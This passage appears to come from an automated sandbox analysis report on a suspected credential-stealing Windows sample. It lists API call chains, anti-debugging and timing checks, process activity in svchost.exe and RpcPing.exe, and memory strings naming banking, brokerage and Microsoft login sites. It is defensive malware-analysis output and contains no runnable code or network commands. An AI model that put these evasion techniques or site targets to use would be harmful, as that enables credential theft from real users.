            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004EC4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_004EC4E0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 0J030901P.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 0J030901P.5.drBinary or memory string: discord.comVMware20,11696494690f
            Source: 0J030901P.5.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: 0J030901P.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 0J030901P.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 0J030901P.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 0J030901P.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 0J030901P.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 0J030901P.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: 0J030901P.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 0J030901P.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 0J030901P.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: 0J030901P.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 0J030901P.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 0J030901P.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: 0J030901P.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: firefox.exe, 0000000A.00000002.2103029195.00000226AD45C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: 0J030901P.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: 0J030901P.5.drBinary or memory string: global block list test formVMware20,11696494690
            Source: IpIaYUETnYWFH.exe, 00000006.00000002.3364445145.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
            Source: 0J030901P.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 0J030901P.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 0J030901P.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 0J030901P.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 0J030901P.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 0J030901P.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeAPI call chain: ExitProcess graph end nodegraph_0-86789
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004175D3 LdrLoadDll,2_2_004175D3
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_03EC02E0 mov eax, dword ptr fs:[00000030h]0_2_03EC02E0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_03EBE148 mov eax, dword ptr fs:[00000030h]0_2_03EBE148
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_03EBE0E8 mov eax, dword ptr fs:[00000030h]0_2_03EBE0E8
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_03EC1950 mov eax, dword ptr fs:[00000030h]0_2_03EC1950
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_03EC18F0 mov eax, dword ptr fs:[00000030h]0_2_03EC18F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]2_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]2_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]2_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]2_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]2_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]2_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]2_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]2_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]2_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]2_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]2_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]2_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]2_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]2_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]2_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]2_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
